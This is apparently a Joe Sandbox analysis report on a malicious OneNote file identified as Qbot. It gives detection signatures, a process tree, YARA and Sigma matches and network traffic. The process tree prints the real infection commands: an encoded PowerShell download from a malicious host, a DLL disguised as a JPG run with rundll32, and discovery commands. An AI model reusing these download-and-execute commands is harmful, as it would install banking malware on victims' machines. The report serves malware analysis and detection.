Edit tour

Windows Analysis Report
notes.one

Overview

General Information

Sample Name:	notes.one
Analysis ID:	800701
MD5:	f37c173417e5c9d9264f00cc6ec0e924
SHA1:	552bdc49b09a566ded145d5befaa9e8623aaa3f2
SHA256:	ca0ee9618e132e177e54276defa733a0338123c73ca880e031f814c0936d703b
Infos:

Detection

Qbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Qbot

Sigma detected: Execute DLL with spoofed extension

DLL reload attack detected

Malicious sample detected (through community Yara rule)

Uses netstat to query active network connections and open ports

Maps a DLL or memory area into another process

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Queries memory information (via WMI often done to detect virtual machines)

Allocates memory in foreign processes

Powershell drops PE file

Uses ipconfig to lookup or modify the Windows network settings

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Document exploit detected (process start blacklist hit)

Gathers network related connection and port information

Writes to foreign memory regions

Renames NTDLL to bypass HIPS

Suspicious powershell command line found

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Uses whoami command line tool to query computer and username

Performs a network lookup / discovery via net view

Performs a network lookup / discovery via ARP

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Drops PE files to the application program directory (C:\ProgramData)

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Found evasive API chain checking for process token information

Binary contains a suspicious time stamp

Creates a start menu entry (Start Menu\Programs\Startup)

PE file overlay found

Creates a process in suspended mode (likely to inject code)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Yara signature match

PE file contains sections with non-standard names

Contains functionality to call native functions

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Enables debug privileges

AV process strings found (often used to terminate AV products)

PE file does not import any functions

PE file contains an invalid checksum

Detected TCP or UDP traffic on non-standard ports

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

Process Tree

System is w10x64native

ONENOTE.EXE (PID: 2776 cmdline: C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\notes.one MD5: 59056F600C4366EE07277C20A90DAF67)

ONENOTEM.EXE (PID: 7096 cmdline: /tsr MD5: 377069572D48FFBF1EA2DA466A61B398)

cmd.exe (PID: 1792 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Open.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 5548 cmdline: powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3N0YXJjb21wdXRhZG9yYXMuY29tL2x0MmVMTTYvMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg==')) MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 5784 cmdline: C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 4460 cmdline: powershell Invoke-WebRequest -URI https://starcomputadoras.com/lt2eLM6/01.gif -OutFile C:\programdata\putty.jpg MD5: 04029E121A0CFA5991749937DD22A1D9)

rundll32.exe (PID: 5548 cmdline: rundll32 C:\programdata\putty.jpg,Wind MD5: EF3179D498793BF4234F708D3BE28633)

rundll32.exe (PID: 6804 cmdline: rundll32 C:\programdata\putty.jpg,Wind MD5: 889B99C52A60DD49227C5E485A016679)

backgroundTaskHost.exe (PID: 7584 cmdline: C:\Windows\SysWOW64\backgroundTaskHost.exe MD5: F290D12F0351B56708B3DF1EC26CB45B)

net.exe (PID: 3420 cmdline: net view MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 5948 cmdline: cmd /c set MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

ARP.EXE (PID: 7408 cmdline: arp -a MD5: 4D3943EDBC9C7E18DC3469A21B30B3CE)

conhost.exe (PID: 5584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

ipconfig.exe (PID: 3116 cmdline: ipconfig /all MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)

conhost.exe (PID: 4832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

net.exe (PID: 5840 cmdline: net share MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

net1.exe (PID: 4164 cmdline: C:\Windows\system32\net1 share MD5: 207DEB8572F128E9AE8062D9CF3A6E8A)

ROUTE.EXE (PID: 4992 cmdline: route print MD5: C563191ED28A926BCFDB1071374575F1)

conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

NETSTAT.EXE (PID: 3760 cmdline: netstat -nao MD5: 9DB170ED520A6DD57B5AC92EC537368A)

conhost.exe (PID: 1392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

net.exe (PID: 4372 cmdline: net localgroup MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

net1.exe (PID: 3528 cmdline: C:\Windows\system32\net1 localgroup MD5: 207DEB8572F128E9AE8062D9CF3A6E8A)

whoami.exe (PID: 6352 cmdline: whoami /all MD5: 801D9A1C1108360B84E60A457D5A773A)

conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

ONENOTEM.EXE (PID: 6748 cmdline: "C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE" /tsr MD5: 377069572D48FFBF1EA2DA466A61B398)

msiexec.exe (PID: 2632 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.33862410772.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
Process Memory Space: powershell.exe PID: 5548	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x11788:$b2: ::FromBase64String( 0x118cb:$b2: ::FromBase64String( 0x2743c:$b2: ::FromBase64String( 0x2757e:$b2: ::FromBase64String( 0x289df:$b2: ::FromBase64String( 0x28b08:$b2: ::FromBase64String( 0x28c41:$b2: ::FromBase64String( 0x40076:$b2: ::FromBase64String( 0x401b9:$b2: ::FromBase64String( 0x404d3:$b2: ::FromBase64String( 0x407d1:$b2: ::FromBase64String( 0x436b1:$b2: ::FromBase64String( 0x5df00:$b2: ::FromBase64String( 0x8d85a:$b2: ::FromBase64String( 0xb8f45:$b2: ::FromBase64String( 0xb9087:$b2: ::FromBase64String( 0xe9542:$b2: ::FromBase64String( 0xffd33:$b2: ::FromBase64String( 0xffeed:$b2: ::FromBase64String( 0x1000f0:$b2: ::FromBase64String( 0x101495:$b2: ::FromBase64String(

Unpacked PEs

Source	Rule	Description	Author
14.2.rundll32.exe.2fbd640.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
14.2.rundll32.exe.10000000.1.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
14.2.rundll32.exe.2fbd640.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security

Sigma Signatures

Data Obfuscation

Sigma detected: Execute DLL with spoofed extension

Source: Process started

Author: Joe Security: Data: Command: rundll32 C:\programdata\putty.jpg,Wind, CommandLine: rundll32 C:\programdata\putty.jpg,Wind, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5784, ParentProcessName: cmd.exe, ProcessCommandLine: rundll32 C:\programdata\putty.jpg,Wind, ProcessId: 5548, ProcessName: rundll32.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: unknown	HTTPS traffic detected: 144.217.139.27:443 -> 192.168.11.20:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 72.163.4.185:443 -> 192.168.11.20:49850 version: TLS 1.2

Source:	Binary string: amstream.pdb source: backgroundTaskHost.exe, 0000000F.00000003.33864485500.0000000004651000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: 76d4c8d1.dll.14.dr
Source:	Binary string: wntdll.pdb source: 76d4c8d1.dll.14.dr
Source:	Binary string: amstream.pdbGCTL source: backgroundTaskHost.exe, 0000000F.00000003.33864485500.0000000004651000.00000004.00000020.00020000.00000000.sdmp

Spreading

Performs a network lookup / discovery via net view

Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\net.exe net view
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\net.exe net view			Jump to behavior

Performs a network lookup / discovery via ARP

Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\ARP.EXE arp -a
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Process created: C:\Windows\SysWOW64\ARP.EXE arp -a			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_1000C547 FindFirstFileW,FindNextFileW,

14_2_1000C547

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

Process created: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE

Networking

Uses netstat to query active network connections and open ports

Source: C:\Windows\SysWOW64\backgroundTaskHost.exe

Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -nao

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /lt2eLM6/01.gif HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: starcomputadoras.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cisco.comCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 72.163.4.185 72.163.4.185

Source: global traffic

TCP traffic: 192.168.11.20:49852 -> 92.177.204.2:2222

Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: http://cdn.appdynamics.com
Source: powershell.exe, 00000009.00000002.33804937477.000001D66BD20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000009.00000002.33804937477.000001D66BD20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: http://pdx-col.eum-appdynamics.com
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: http://schema.org/ImageObject
Source: powershell.exe, 00000009.00000002.33796253441.000001D6539E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: powershell.exe, 00000009.00000002.33804937477.000001D66BD20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: powershell.exe, 00000009.00000002.33796253441.000001D653A3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000009.00000002.33796253441.000001D653A4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://api.aadrm.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://api.aadrm.com/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://api.cortana.ai
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://api.office.net
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://api.onedrive.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://api.scheduler.
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://augloop.office.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://cdn.appdynamics.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://cdn.entity.
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://ciscocx.qualtrics.com/jfe/form/SV_0Tcp9VU8pUm4lBY?Ref=/c/en/us/index.html
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://clients.config.office.net/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://community.cisco.com/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://config.edge.skype.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://cortana.ai
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://cortana.ai/api
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://cr.office.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://d.docs.live.net
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://dev.cortana.ai
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://devnull.onenote.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://directory.services.
Source: X4QZWFTE.htm.15.dr	String found in binary or memory: https://duo.com/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601292631425
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://fpastorage.cdn.office.net/%s
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://fpastorage.cdn.office.net/firstpartyapp/addins.xml
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://graph.windows.net
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://graph.windows.net/
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 064969FC-AFD0-4F49-92AA-9AFA4DCD48CC.2.dr	String found in binary or memory: https://incidents.diagnostics.office.com
